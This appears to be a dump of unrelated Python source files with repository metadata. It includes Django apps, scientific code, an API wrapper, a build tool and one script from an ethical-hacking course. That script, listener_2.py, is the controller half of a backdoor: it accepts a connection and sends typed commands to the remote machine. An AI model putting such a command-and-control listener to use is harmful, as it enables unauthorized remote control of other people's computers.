self.assertEqual(aos.shape[1], sv.norbs)
if __name__ == "__main__": unittest.main()
| 38.03125 | 102 | 0.739523 | 191 | 1,217 | 4.565445 | 0.633508 | 0.068807 | 0.029817 | 0.036697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019569 | 0.16023 | 1,217 | 31 | 103 | 39.258065 | 0.833659 | 0.508628 | 0 | 0 | 0 | 0 | 0.022453 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.083333 | false | 0 | 0.333333 | 0 | 0.5 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bea8aa6132f2274610cc25a57ec0c74c8765342d | 371 | py | Python | students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py | aglaya-pill/ITMO_ICT_WebDevelopment_2021-2022 | a63691317a72fb9b29ae537bc3d7766661458c22 | [
"MIT"
] | null | null | null | students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py | aglaya-pill/ITMO_ICT_WebDevelopment_2021-2022 | a63691317a72fb9b29ae537bc3d7766661458c22 | [
"MIT"
] | null | null | null | students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py | aglaya-pill/ITMO_ICT_WebDevelopment_2021-2022 | a63691317a72fb9b29ae537bc3d7766661458c22 | [
"MIT"
] | null | null | null | from django.urls import path, include
from rest_framework_jwt.views import obtain_jwt_token
from rest_framework.routers import DefaultRouter
from .views import NoteViewSet
app_name = 'api'
router = DefaultRouter(trailing_slash=False)
router.register('notes', NoteViewSet)
urlpatterns = [
path('jwt-auth/', obtain_jwt_token),
path('', include(router.urls)),
]
| 23.1875 | 53 | 0.77628 | 48 | 371 | 5.8125 | 0.541667 | 0.078853 | 0.121864 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121294 | 371 | 15 | 54 | 24.733333 | 0.855828 | 0 | 0 | 0 | 0 | 0 | 0.045822 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.363636 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
beb313eb5f64fc657c1686ad77dc2225b87a4889 | 570 | py | Python | viewer_examples/plugins/median_filter.py | atemysemicolon/scikit-image | a48cf5822f9539c6602b9327c18253aed14fa692 | [
"BSD-3-Clause"
] | null | null | null | viewer_examples/plugins/median_filter.py | atemysemicolon/scikit-image | a48cf5822f9539c6602b9327c18253aed14fa692 | [
"BSD-3-Clause"
] | null | null | null | viewer_examples/plugins/median_filter.py | atemysemicolon/scikit-image | a48cf5822f9539c6602b9327c18253aed14fa692 | [
"BSD-3-Clause"
] | null | null | null | from skimage import data
from skimage.filter.rank import median
from skimage.morphology import disk
from skimage.viewer import ImageViewer
from skimage.viewer.widgets import Slider, OKCancelButtons, SaveButtons
from skimage.viewer.plugins.base import Plugin
def median_filter(image, radius):
return median(image, selem=disk(radius))
image = data.coins()
viewer = ImageViewer(image)
plugin = Plugin(image_filter=median_filter)
plugin += Slider('radius', 2, 10, value_type='int')
plugin += SaveButtons()
plugin += OKCancelButtons()
viewer += plugin
viewer.show()
| 25.909091 | 71 | 0.784211 | 74 | 570 | 5.986486 | 0.405405 | 0.148984 | 0.115124 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005952 | 0.115789 | 570 | 21 | 72 | 27.142857 | 0.873016 | 0 | 0 | 0 | 0 | 0 | 0.015789 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.375 | 0.0625 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
beb680071d94ed8dd93dc11b2e313714df1f9b83 | 1,727 | py | Python | dingtalk/message/conversation.py | kangour/dingtalk-python | b37b9dac3ca3ff9d727308fb120a8fd05e11eaa5 | [
"Apache-2.0"
] | 88 | 2017-12-28T05:23:15.000Z | 2021-12-20T13:44:18.000Z | dingtalk/message/conversation.py | niulinlnc/dingtalk-python | c4209658f88344e8f0890137ed7c887c8b740a6c | [
"Apache-2.0"
] | 8 | 2018-04-28T05:41:49.000Z | 2021-06-01T21:51:11.000Z | dingtalk/message/conversation.py | niulinlnc/dingtalk-python | c4209658f88344e8f0890137ed7c887c8b740a6c | [
"Apache-2.0"
] | 43 | 2017-12-07T09:43:48.000Z | 2021-12-03T01:19:52.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2017/11/30 下午3:02
# @Author : Matrix
# @Github : https://github.com/blackmatrix7/
# @Blog : http://www.cnblogs.com/blackmatrix/
# @File : messages.py
# @Software: PyCharm
import json
from ..foundation import *
from json import JSONDecodeError
__author__ = 'blackmatrix'
__all__ = ['async_send_msg', 'get_msg_send_result', 'get_msg_send_progress']
@dingtalk_resp
def async_send_msg(access_token, msgtype, agent_id, msgcontent, userid_list=None, dept_id_list=None, to_all_user=False):
try:
msgcontent = json.dumps(msgcontent)
except JSONDecodeError:
# 如果传入的msgcontent不能转换为json格式,依旧传给钉钉,由钉钉处理
pass
if not isinstance(userid_list, str):
userid_list = ','.join(userid_list)
args = locals().copy()
payload = {}
# 请求参数整理
for k, v in args.items():
if k in ('msgtype', 'agent_id', 'msgcontent', 'userid_list', 'dept_id_list'):
if v is not None:
payload.update({k: v})
resp = call_dingtalk_webapi(access_token, 'dingtalk.corp.message.corpconversation.asyncsend', **payload)
return resp
@dingtalk_resp
def get_msg_send_result(access_token, agent_id, task_id):
url = get_request_url(access_token, 'dingtalk.corp.message.corpconversation.getsendresult')
payload = {'task_id': task_id, 'agent_id': agent_id}
return requests.get(url, params=payload)
@dingtalk_resp
def get_msg_send_progress(access_token, agent_id, task_id):
url = get_request_url(access_token, 'dingtalk.corp.message.corpconversation.getsendprogress')
payload = {'task_id': task_id, 'agent_id': agent_id}
return requests.get(url, params=payload)
if __name__ == '__main__':
pass
| 31.981481 | 120 | 0.70469 | 227 | 1,727 | 5.044053 | 0.427313 | 0.048908 | 0.034935 | 0.060262 | 0.408734 | 0.408734 | 0.265502 | 0.265502 | 0.265502 | 0.265502 | 0 | 0.009059 | 0.169079 | 1,727 | 53 | 121 | 32.584906 | 0.78885 | 0.149392 | 0 | 0.272727 | 0 | 0 | 0.209733 | 0.119945 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.060606 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bebc4c58538a85c2ad00b34ebacde9538e3d0d9b | 1,613 | py | Python | board/models.py | Fahreeve/TaskManager | 7f0a16312b43867270eaade1fe153c07abc2c10e | [
"MIT"
] | null | null | null | board/models.py | Fahreeve/TaskManager | 7f0a16312b43867270eaade1fe153c07abc2c10e | [
"MIT"
] | null | null | null | board/models.py | Fahreeve/TaskManager | 7f0a16312b43867270eaade1fe153c07abc2c10e | [
"MIT"
] | 1 | 2020-09-15T09:15:13.000Z | 2020-09-15T09:15:13.000Z | from django.contrib.auth.models import User
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
from django.utils.translation import ugettext_lazy as _
class Task(models.Model):
CLOSE = 'cl'
CANCEL = 'ca'
LATER = 'la'
UNDEFINED = 'un'
CHOICES = (
(UNDEFINED, _("Неизвестно")),
(CLOSE, _("Завершить")),
(CANCEL, _("Отменить")),
(LATER, _("Отложить")),
)
title = models.CharField(_("Заголовок"), max_length=50)
description = models.TextField(_("Описание"))
executor = models.ForeignKey(User, verbose_name=_("Исполнитель"), on_delete=models.CASCADE)
status = models.CharField(_("Статус"), choices=CHOICES, default=UNDEFINED, max_length=2)
deadline = models.DateTimeField(_("Дедлайн"))
priority = models.IntegerField(_("Приоритет"), default=1, validators=[MinValueValidator(1), MaxValueValidator(3)])
changed = models.DateTimeField(_("Дата последнего изменения"), auto_now=True)
created = models.DateTimeField(_("Дата создания"), auto_now_add=True)
@property
def text_status(self):
choices = dict(self.CHOICES)
return choices[self.status]
@property
def text_deadline(self):
return self.deadline.strftime("%d.%m.%Y %H:%M")
class Comment(models.Model):
task = models.ForeignKey(Task, related_name="comments", on_delete=models.CASCADE)
creator = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
text = models.TextField(_('Комментарий'))
created = models.DateTimeField(_("Дата создания"), auto_now_add=True)
| 37.511628 | 118 | 0.695598 | 180 | 1,613 | 6.061111 | 0.5 | 0.036664 | 0.038497 | 0.038497 | 0.095325 | 0.095325 | 0.095325 | 0.095325 | 0.095325 | 0 | 0 | 0.004461 | 0.16615 | 1,613 | 42 | 119 | 38.404762 | 0.806691 | 0 | 0 | 0.114286 | 0 | 0 | 0.109733 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057143 | false | 0 | 0.114286 | 0.028571 | 0.771429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bebe436d87bb3f3a76cbb71e91dc6e70bb5b2e46 | 475 | py | Python | test/test_hex_line.py | bicobus/Hexy | e75d58e66546c278fb648af85e3f9dae53127826 | [
"MIT"
] | 72 | 2017-08-30T03:02:51.000Z | 2022-03-11T23:15:15.000Z | test/test_hex_line.py | bicobus/Hexy | e75d58e66546c278fb648af85e3f9dae53127826 | [
"MIT"
] | 10 | 2019-03-14T08:04:33.000Z | 2021-08-10T09:36:45.000Z | test/test_hex_line.py | bicobus/Hexy | e75d58e66546c278fb648af85e3f9dae53127826 | [
"MIT"
] | 15 | 2017-11-08T05:37:06.000Z | 2021-08-05T19:16:48.000Z | import numpy as np
import hexy as hx
def test_get_hex_line():
expected = [
[-3, 3, 0],
[-2, 2, 0],
[-1, 2, -1],
[0, 2, -2],
[1, 1, -2],
]
start = np.array([-3, 3, 0])
end = np.array([1, 1, -2])
print(hx.get_hex_line(start, end))
print(expected);
assert(np.array_equal(
hx.get_hex_line(start, end),
expected));
if __name__ == "__main__":
test_get_hex_line()
| 21.590909 | 38 | 0.471579 | 68 | 475 | 3.014706 | 0.367647 | 0.117073 | 0.195122 | 0.136585 | 0.195122 | 0.195122 | 0 | 0 | 0 | 0 | 0 | 0.068627 | 0.355789 | 475 | 21 | 39 | 22.619048 | 0.601307 | 0 | 0 | 0 | 0 | 0 | 0.016842 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 1 | 0.052632 | false | 0 | 0.105263 | 0 | 0.157895 | 0.105263 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bebe5670df71295bc98ec96c4bde4a3c31d4fb66 | 6,747 | py | Python | wofry/propagator/propagators2D/integral.py | PaNOSC-ViNYL/wofry | 779b5a738ee7738e959a58aafe01e7e49b03894a | [
"MIT"
] | null | null | null | wofry/propagator/propagators2D/integral.py | PaNOSC-ViNYL/wofry | 779b5a738ee7738e959a58aafe01e7e49b03894a | [
"MIT"
] | 1 | 2021-02-16T12:12:10.000Z | 2021-02-16T12:12:10.000Z | wofryimpl/propagator/propagators2D/integral.py | oasys-kit/wofryimpl | f300b714b038110987783c40d2c3af8dca7e54eb | [
"MIT"
] | null | null | null | # propagate_2D_integral: Simplification of the Kirchhoff-Fresnel integral. TODO: Very slow and give some problems
import numpy
from wofry.propagator.wavefront2D.generic_wavefront import GenericWavefront2D
from wofry.propagator.propagator import Propagator2D
# TODO: check resulting amplitude normalization (fft and srw likely agree, convolution gives too high amplitudes, so needs normalization)
class Integral2D(Propagator2D):
HANDLER_NAME = "INTEGRAL_2D"
def get_handler_name(self):
return self.HANDLER_NAME
def do_specific_progation_after(self, wavefront, propagation_distance, parameters, element_index=None):
return self.do_specific_progation(wavefront, propagation_distance, parameters, element_index=element_index)
def do_specific_progation_before(self, wavefront, propagation_distance, parameters, element_index=None):
return self.do_specific_progation( wavefront, propagation_distance, parameters, element_index=element_index)
"""
2D Fresnel-Kirchhoff propagator via simplified integral
NOTE: this propagator is experimental and much less performant than the ones using Fourier Optics
Therefore, it is not recommended to use.
:param wavefront:
:param propagation_distance: propagation distance
:param shuffle_interval: it is known that this method replicates the central diffraction spot
The distace of the replica is proportional to 1/pixelsize
To avoid that, it is possible to change a bit (randomly) the coordinates
of the wavefront. shuffle_interval controls this shift: 0=No shift. A typical
value can be 1e5.
The result shows a diffraction pattern without replica but with much noise.
:param calculate_grid_only: if set, it calculates only the horizontal and vertical profiles, but returns the
full image with the other pixels to zero. This is useful when calculating large arrays,
so it is set as the default.
:return: a new 2D wavefront object with propagated wavefront
"""
def do_specific_progation(self, wavefront, propagation_distance, parameters, element_index=None):
shuffle_interval = self.get_additional_parameter("shuffle_interval",False,parameters,element_index=element_index)
calculate_grid_only = self.get_additional_parameter("calculate_grid_only",True,parameters,element_index=element_index)
return self.propagate_wavefront(wavefront,propagation_distance,shuffle_interval=shuffle_interval,
calculate_grid_only=calculate_grid_only)
@classmethod
def propagate_wavefront(cls,wavefront,propagation_distance,shuffle_interval=False,calculate_grid_only=True):
#
# Fresnel-Kirchhoff integral (neglecting inclination factor)
#
if not calculate_grid_only:
#
# calculation over the whole detector area
#
p_x = wavefront.get_coordinate_x()
p_y = wavefront.get_coordinate_y()
wavelength = wavefront.get_wavelength()
amplitude = wavefront.get_complex_amplitude()
det_x = p_x.copy()
det_y = p_y.copy()
p_X = wavefront.get_mesh_x()
p_Y = wavefront.get_mesh_y()
det_X = p_X
det_Y = p_Y
amplitude_propagated = numpy.zeros_like(amplitude,dtype='complex')
wavenumber = 2 * numpy.pi / wavelength
for i in range(det_x.size):
for j in range(det_y.size):
if not shuffle_interval:
rd_x = 0.0
rd_y = 0.0
else:
rd_x = (numpy.random.rand(p_x.size,p_y.size)-0.5)*shuffle_interval
rd_y = (numpy.random.rand(p_x.size,p_y.size)-0.5)*shuffle_interval
r = numpy.sqrt( numpy.power(p_X + rd_x - det_X[i,j],2) +
numpy.power(p_Y + rd_y - det_Y[i,j],2) +
numpy.power(propagation_distance,2) )
amplitude_propagated[i,j] = (amplitude / r * numpy.exp(1.j * wavenumber * r)).sum()
output_wavefront = GenericWavefront2D.initialize_wavefront_from_arrays(det_x,det_y,amplitude_propagated)
else:
x = wavefront.get_coordinate_x()
y = wavefront.get_coordinate_y()
X = wavefront.get_mesh_x()
Y = wavefront.get_mesh_y()
wavenumber = 2 * numpy.pi / wavefront.get_wavelength()
amplitude = wavefront.get_complex_amplitude()
used_indices = wavefront.get_mask_grid(width_in_pixels=(1,1),number_of_lines=(1,1))
indices_x = wavefront.get_mesh_indices_x()
indices_y = wavefront.get_mesh_indices_y()
indices_x_flatten = indices_x[numpy.where(used_indices == 1)].flatten()
indices_y_flatten = indices_y[numpy.where(used_indices == 1)].flatten()
X_flatten = X[numpy.where(used_indices == 1)].flatten()
Y_flatten = Y[numpy.where(used_indices == 1)].flatten()
complex_amplitude_propagated = amplitude*0
print("propagate_2D_integral: Calculating %d points from a total of %d x %d = %d"%(
X_flatten.size,amplitude.shape[0],amplitude.shape[1],amplitude.shape[0]*amplitude.shape[1]))
for i in range(X_flatten.size):
r = numpy.sqrt( numpy.power(wavefront.get_mesh_x() - X_flatten[i],2) +
numpy.power(wavefront.get_mesh_y() - Y_flatten[i],2) +
numpy.power(propagation_distance,2) )
complex_amplitude_propagated[int(indices_x_flatten[i]),int(indices_y_flatten[i])] = (amplitude / r * numpy.exp(1.j * wavenumber * r)).sum()
output_wavefront = GenericWavefront2D.initialize_wavefront_from_arrays(x_array=x,
y_array=y,
z_array=complex_amplitude_propagated,
wavelength=wavefront.get_wavelength())
# added srio@esrf.eu 2018-03-23 to conserve energy - TODO: review method!
output_wavefront.rescale_amplitude( numpy.sqrt(wavefront.get_intensity().sum() /
output_wavefront.get_intensity().sum()))
return output_wavefront
| 49.977778 | 156 | 0.621165 | 784 | 6,747 | 5.100765 | 0.276786 | 0.060015 | 0.032008 | 0.047512 | 0.35859 | 0.249062 | 0.218555 | 0.188547 | 0.144536 | 0.144536 | 0 | 0.011702 | 0.303394 | 6,747 | 134 | 157 | 50.350746 | 0.839149 | 0.062102 | 0 | 0.109589 | 0 | 0 | 0.024619 | 0.004299 | 0 | 0 | 0 | 0.014925 | 0 | 1 | 0.068493 | false | 0 | 0.041096 | 0.041096 | 0.205479 | 0.013699 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bebf8ceeebe9e29c2c913232279dc6462e901f90 | 334 | py | Python | Desafio051.py | GabrielSanchesRosa/Python | 3a129e27e076b2a91af03d68ede50b9c45c50217 | [
"MIT"
] | null | null | null | Desafio051.py | GabrielSanchesRosa/Python | 3a129e27e076b2a91af03d68ede50b9c45c50217 | [
"MIT"
] | null | null | null | Desafio051.py | GabrielSanchesRosa/Python | 3a129e27e076b2a91af03d68ede50b9c45c50217 | [
"MIT"
] | null | null | null | # Desenvolva um programa que leia o primeiro termo e a razão de uma PA. No final mostre, os 10 primeiros termos dessa prograssão.
primeiro = int(input("Primeiro Termo: "))
razao = int(input("Razão: "))
decimo = primeiro + (10 - 1) * razao
for c in range(primeiro, decimo + razao, razao):
print(f"{c}", end=" -> ")
print("Acabou")
| 33.4 | 129 | 0.679641 | 51 | 334 | 4.45098 | 0.705882 | 0.114537 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018182 | 0.176647 | 334 | 9 | 130 | 37.111111 | 0.807273 | 0.38024 | 0 | 0 | 0 | 0 | 0.17561 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bec28b12230a8be61261eca269a7854ba31ae9da | 820 | py | Python | src/15 listener_and_backdoor/listener_2.py | raminjafary/ethical-hacking | e76f74f4f23e1d8cb7f433d19871dcf966507dfc | [
"MIT"
] | null | null | null | src/15 listener_and_backdoor/listener_2.py | raminjafary/ethical-hacking | e76f74f4f23e1d8cb7f433d19871dcf966507dfc | [
"MIT"
] | null | null | null | src/15 listener_and_backdoor/listener_2.py | raminjafary/ethical-hacking | e76f74f4f23e1d8cb7f433d19871dcf966507dfc | [
"MIT"
] | null | null | null | #!/usr/bin/python
import socket
class Listener:
def __init__(self,ip,port):
listener = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
#options to reuse sockets
#listener.bind(("localhost",1234))
listener.bind((ip,port))
listener.listen(0)
print "[+] Waiting for Incoming Connection"
#listen for connecion backlog is set to 0 don't need to wory about 0
self.connection,address = listener.accept()
print "[+] Got a Connection from " + str(address)
def execute_remotely(self,command):
self.connection.send(command)
return self.connection.recv(1024)
def run(self):
while True:
command = raw_input(">> ")
result = self.execute_remotely(command)
print result
my_listener = Listener("localhost",1234)
my_listener.run() | 25.625 | 70 | 0.734146 | 114 | 820 | 5.166667 | 0.561404 | 0.061121 | 0.047538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02276 | 0.142683 | 820 | 32 | 71 | 25.625 | 0.815078 | 0.170732 | 0 | 0 | 0 | 0 | 0.107829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.05 | null | null | 0.15 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bec6becd26fa525cff31dffaad9d3ab5e8f46f15 | 11,873 | py | Python | lib/fbuild/builders/__init__.py | felix-lang/fbuild | 9595fbfd6d3ceece31fda2f96c35d4a241f0129b | [
"PSF-2.0",
"BSD-2-Clause"
] | 40 | 2015-02-07T00:44:12.000Z | 2021-04-02T13:41:08.000Z | lib/fbuild/builders/__init__.py | felix-lang/fbuild | 9595fbfd6d3ceece31fda2f96c35d4a241f0129b | [
"PSF-2.0",
"BSD-2-Clause"
] | 30 | 2015-02-06T17:45:15.000Z | 2019-01-10T16:34:29.000Z | lib/fbuild/builders/__init__.py | felix-lang/fbuild | 9595fbfd6d3ceece31fda2f96c35d4a241f0129b | [
"PSF-2.0",
"BSD-2-Clause"
] | 3 | 2015-09-03T06:38:02.000Z | 2019-10-24T14:26:57.000Z | import abc
import contextlib
import os
import sys
from functools import partial
from itertools import chain
import fbuild
import fbuild.db
import fbuild.path
import fbuild.temp
from . import platform
# ------------------------------------------------------------------------------
class MissingProgram(fbuild.ConfigFailed):
def __init__(self, programs=None):
self.programs = programs
def __str__(self):
if self.programs is None:
return 'cannot find program'
else:
return 'cannot find any of the programs %s' % \
' '.join(repr(str(p)) for p in self.programs)
# ------------------------------------------------------------------------------
@fbuild.db.caches
def find_program(ctx, names, paths=None, *, quieter=0):
"""L{find_program} is a test that searches the paths for one of the
programs in I{name}. If one is found, it is returned. If not, the next
name in the list is searched for."""
if paths is None:
paths = os.environ['PATH'].split(os.pathsep)
# If we're running on windows, we need to append '.exe' to the filenames
# that we're searching for.
if sys.platform == 'win32':
new_names = []
for name in names:
if \
not name.endswith('.exe') or \
not name.endswith('.cmd') or \
not name.endswith('.bat'):
new_names.append(name + '.exe')
new_names.append(name + '.cmd')
new_names.append(name + '.bat')
new_names.append(name)
names = new_names
for name in names:
filename = fbuild.path.Path(name)
ctx.logger.check('looking for ' + filename.name, verbose=quieter)
if filename.exists() and filename.isfile():
ctx.logger.passed('ok %s' % filename, verbose=quieter)
return fbuild.path.Path(name)
else:
for path in paths:
filename = fbuild.path.Path(path, name)
if filename.exists() and filename.isfile():
ctx.logger.passed('ok %s' % filename, verbose=quieter)
return fbuild.path.Path(filename)
ctx.logger.failed(verbose=quieter)
raise MissingProgram(names)
# ------------------------------------------------------------------------------
def check_version(ctx, builder, version_function, *,
requires_version=None,
requires_at_least_version=None,
requires_at_most_version=None):
"""Helper function to simplify checking the version of a builder."""
if any(v is not None for v in (
requires_version,
requires_at_least_version,
requires_at_most_version)):
ctx.logger.check('checking %s version' % builder)
version_str = version_function()
# Convert the version into a tuple
version = []
for i in version_str.split('.'):
try:
version.append(int(i))
except ValueError:
# The subversion isn't a number, so just convert it to a
# string.
version.append(i)
version = tuple(version)
if requires_version is not None and requires_version != version:
msg = 'version %s required; found %s' % (
'.'.join(str(i) for i in requires_version), version_str)
ctx.logger.failed(msg)
raise fbuild.ConfigFailed(msg)
if requires_at_least_version is not None and \
requires_at_least_version > version:
msg = 'at least version %s required; found %s' % (
'.'.join(str(i) for i in requires_at_least_version),
version_str)
ctx.logger.failed(msg)
raise fbuild.ConfigFailed(msg)
if requires_at_most_version is not None and \
requires_at_most_version < version:
msg = 'at most version %s required; found %s' % (
'.'.join(str(i) for i in requires_at_most_version),
version_str)
ctx.logger.failed(msg)
raise fbuild.ConfigFailed(msg)
ctx.logger.passed(version_str)
# ------------------------------------------------------------------------------
class AbstractCompiler(fbuild.db.PersistentObject):
def __init__(self, *args, src_suffix, **kwargs):
super().__init__(*args, **kwargs)
self.src_suffix = src_suffix
@fbuild.db.cachemethod
def compile(self, src:fbuild.db.SRC, *args, **kwargs) -> fbuild.db.DST:
return self.uncached_compile(src, *args, **kwargs)
@abc.abstractmethod
def uncached_compile(self, src, *args, **kwargs):
pass
@fbuild.db.cachemethod
@platform.auto_platform_options()
def build_objects(self, srcs:fbuild.db.SRCS, *args, **kwargs) -> \
fbuild.db.DSTS:
"""Compile all of the passed in L{srcs} in parallel."""
# When a object has extra external dependencies, such as .c files
# depending on .h changes, depending on library changes, we need to add
# the dependencies in build_objects. Unfortunately, the db doesn't
# know about these new files and so it can't tell when a function
# really needs to be rerun. So, we'll just not cache this function.
# We need to add extra dependencies to our call.
objs = []
src_deps = []
dst_deps = []
for o, s, d in self.ctx.scheduler.map(
partial(self.compile.call, *args, **kwargs),
srcs):
objs.append(o)
src_deps.extend(s)
dst_deps.extend(d)
self.ctx.db.add_external_dependencies_to_call(
srcs=src_deps,
dsts=dst_deps)
return objs
# --------------------------------------------------------------------------
def tempfile(self, code):
return fbuild.temp.tempfile(code, self.src_suffix)
@contextlib.contextmanager
def tempfile_compile(self, code='', *, quieter=1, **kwargs):
with self.tempfile(code) as src:
yield self.uncached_compile(src, quieter=quieter, **kwargs)
@platform.auto_platform_options()
def try_compile(self, *args, **kwargs):
try:
with self.tempfile_compile(*args, **kwargs):
return True
except fbuild.ExecutionError:
return False
@platform.auto_platform_options()
def check_compile(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_compile(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
# ------------------------------------------------------------------------------
class AbstractLibLinker(AbstractCompiler):
@fbuild.db.cachemethod
@platform.auto_platform_options()
def link_lib(self, dst, srcs:fbuild.db.SRCS, *args,
libs:fbuild.db.SRCS=(),
**kwargs) -> fbuild.db.DST:
"""Link compiled files into a library and caches the results."""
return self.uncached_link_lib(dst, srcs, *args, libs=libs, **kwargs)
@abc.abstractmethod
def uncached_link_lib(self, *args, **kwargs):
pass
@platform.auto_platform_options()
def build_lib(self, dst, srcs, *, objs=(), libs=(), ckwargs={}, lkwargs={}):
"""Compile all of the passed in L{srcs} in parallel, then link them
into a library."""
objs = tuple(chain(objs, self.build_objects(srcs, **ckwargs)))
return self.link_lib(dst, objs, libs=libs, **lkwargs)
# --------------------------------------------------------------------------
@contextlib.contextmanager
@platform.auto_platform_options()
def tempfile_link_lib(self, code='', *, quieter=1, ckwargs={}, **kwargs):
with self.tempfile(code) as src:
dst = src.parent / 'temp'
obj = self.uncached_compile(src, quieter=quieter, **ckwargs)
yield self.uncached_link_lib(dst, [obj], quieter=quieter, **kwargs)
def try_link_lib(self, *args, **kwargs):
try:
with self.tempfile_link_lib(*args, **kwargs):
return True
except fbuild.ExecutionError:
return False
def check_link_lib(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_link_lib(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
# ------------------------------------------------------------------------------
class AbstractRunner(fbuild.db.PersistentObject):
@abc.abstractmethod
def tempfile_run(self, *args, **kwargs):
pass
def try_run(self, code='', quieter=1, **kwargs):
try:
self.tempfile_run(code, quieter=quieter, **kwargs)
except fbuild.ExecutionError:
return False
else:
return True
def check_run(self, code, msg, *args, **kwargs):
self.ctx.logger.check(msg)
if self.try_run(code, *args, **kwargs):
self.ctx.logger.passed()
return True
else:
self.ctx.logger.failed()
return False
# ------------------------------------------------------------------------------
class AbstractExeLinker(AbstractCompiler, AbstractRunner):
@fbuild.db.cachemethod
@platform.auto_platform_options()
def link_exe(self, dst, srcs:fbuild.db.SRCS, *args,
libs:fbuild.db.SRCS=(),
**kwargs) -> fbuild.db.DST:
"""Link compiled files into an executable."""
return self.uncached_link_exe(dst, srcs, *args, libs=libs, **kwargs)
@abc.abstractmethod
def uncached_link_exe(self, *args, **kwargs):
pass
@platform.auto_platform_options()
def build_exe(self, dst, srcs, *, objs=(), libs=(), ckwargs={}, lkwargs={}):
"""Compile all of the passed in L{srcs} in parallel, then link them
into an executable."""
objs = tuple(chain(objs, self.build_objects(srcs, **ckwargs)))
return self.link_exe(dst, objs, libs=libs, **lkwargs)
# --------------------------------------------------------------------------
@contextlib.contextmanager
@platform.auto_platform_options()
def tempfile_link_exe(self, code='', *, quieter=1, ckwargs={}, **kwargs):
with self.tempfile(code) as src:
dst = src.parent / 'temp'
obj = self.uncached_compile(src, quieter=quieter, **ckwargs)
yield self.uncached_link_exe(dst, [obj], quieter=quieter, **kwargs)
@platform.auto_platform_options()
def try_link_exe(self, *args, **kwargs):
try:
with self.tempfile_link_exe(*args, **kwargs):
return True
